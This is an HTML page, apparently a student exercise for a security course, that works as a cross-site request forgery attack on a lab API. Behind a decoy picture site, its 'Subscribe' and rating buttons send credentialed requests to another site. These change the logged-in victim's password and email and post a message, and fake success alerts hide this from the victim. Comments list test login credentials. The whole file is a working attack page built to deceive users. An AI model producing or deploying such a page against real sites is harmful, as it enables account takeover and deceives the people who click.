<html lang="en">
    <head>
        <meta charset="UTF-8">
        <meta name="viewport" content="width=device-width, initial-scale=1.0">
        <meta http-equiv="X-UA-Compatible" content="ie=edge">
        <title>Trustworthy</title>
        <link rel="stylesheet" href="https://stackpath.bootstrapcdn.com/bootstrap/4.3.1/css/bootstrap.min.css" integrity="sha384-ggOyR0iXCbMQv3Xipma34MD+dH/1fQ784/j6cY/iJTQUOhcWr7x9JvoRxT2MZw1T" crossorigin="anonymous">
    </head>

    <body style="padding-top: 56px;">
        <nav class="navbar navbar-expand-lg navbar-dark bg-dark fixed-top">
            <div class="container">
                <a class="navbar-brand" href="#">Trustworthy</a>
            </div>
        </nav>

        <div class="container" id="container">
            <div id="alert" role="alert" style="margin-top: 30px;"></div>

            <!-- SUBSCRIPTION MENU - CHANGE PASSWORD -->
            <div class="row" style="padding-top: 20px;">
                <div class="col-md-12">
                    <div class="card" style="background: #cf324c">
                        <div class="card-body">
                            <div class="card-title">
                                <h2 style="color: white">Subscribe for more feet</h2> 
                            </div>    
                            <div class="card-text">
                                <!---------------- 1. CHANGE PASSWORD --------------->
                                <form>
                                    <input type="text" placeholder="E-Mail">
                                    <button onclick="changePassword()">Subscribe</button>
                                </form>
                            </div>
                        </div>
                    </div>
                </div>
            </div>

            <!-- CONTENT  -->
            <div class="row" style="padding-top: 20px;">
                <div class="col-lg-4 col-md-6 mb-4">
                    <div class="card">
                        <img class="card-img-top" src="feet2.jpg" height="200px">
                        <div class="card-footer">
                            <small class="text-muted">★ ★ ★ ★ ☆</small>
                        </div>
                    </div>
                </div>

                <div class="col-lg-4 col-md-6 mb-4">
                    <div class="card">
                        <img class="card-img-top" src="feet1.jpg" height="200px">
                        <div class="card-footer">
                            <small class="text-muted">★ ★ ☆ ☆ ☆</small>
                        </div>
                    </div>
                </div>
                
                <div class="col-lg-4 col-md-6 mb-4">
                    <div class="card">
                        <img class="card-img-top" src="feet3.jpg" height="200px">
                        <div class="card-footer">
                            <small class="text-muted">★ ★ ★ ★ ★</small>
                        </div>
                    </div>
                </div>
            </div>

            <div class="row" style="padding-top: 20px;">
                <!-- POST MESSAGE TO BLOG -->
                <div class="col-lg-4 col-md-6 mb-4">
                    <div class="card">
                        <button class="btn btn-primary" onclick="postMessage()">I love this Site</button>
                    </div>
                </div>

                <div class="col-lg-4 col-md-6 mb-4"></div>
                
                <!-- CHANGE EMAIL -->
                <div class="col-lg-4 col-md-6 mb-4">
                    <div class="card">
                        <button class="btn btn-primary" onclick="changeEmail()">I hate this Site</button>
                    </div>
                </div>
            </div>
        </div>

        <script>
            // USERNAME: svogel2
            // PW: Test1234! | Pa$$w0rd

            // Credentials must be include for every request - sets sessionId
            async function getUsername() {
                var url = 'https://m183.gibz-informatik.ch/api/csrf/getUsername'
                return fetch(url, {method: 'GET', credentials: 'include'}) 
                    .then(username => {
                        return username
                    }).catch(err => {
                        console.log(res)
                });
            }

            // 1. change the users password
            async function changePassword() {
                getUsername().then(username => {
                    console.log(username);
                    var formData = new FormData();
                    formData.append('username', username);
                    formData.append('password', 'Pa$$w0rd');

                    return fetch('https://m183.gibz-informatik.ch/api/csrf/changePassword', { 
                        method: 'POST', 
                        mode: 'cors',
                        credentials: 'include',
                        body: formData
                    }).then(res => {
                        var alert = document.getElementById("alert")
                        alert.className = "alert alert-success";
                        alert.textContent = "Subscription successful";
                    })
                });
            }

            // 2. change the users email
            // CSRF Token doesn't get validated if there is no token present - theory
            function changeEmail() {
                return fetch('https://m183.gibz-informatik.ch/api/csrf/changeEmail', { 
                    method: 'POST',
                    mode: 'cors',
                    credentials: 'include',
                    headers: {
                        'Content-Type': 'application/json'
                    },
                    body: JSON.stringify({
                        'email': 'pawnd@gibz.ch'
                    })
                }).then(res => {
                        var alert = document.getElementById("alert")
                        alert.className = "alert alert-success";
                        alert.textContent = "Thanks for the rating. We love you!";
                });
            }

            // 3. make a blog post
            // same es 2.
            function postMessage() {
                return fetch('https://m183.gibz-informatik.ch/api/csrf/postMessage', { 
                    method: 'POST',
                    mode: 'cors',
                    credentials: 'include',
                    headers: { 
                        'Content-Type': 'application/json'
                    },
                    body: JSON.stringify({
                        'message': 'PAWND - i love feet'
                    })
                }).then(res => {
                        var alert = document.getElementById("alert")
                        alert.className = "alert alert-danger";
                        alert.textContent = "Rating not accepted. We don't like you.";
                });
            }
        </script>
    </body>
</html>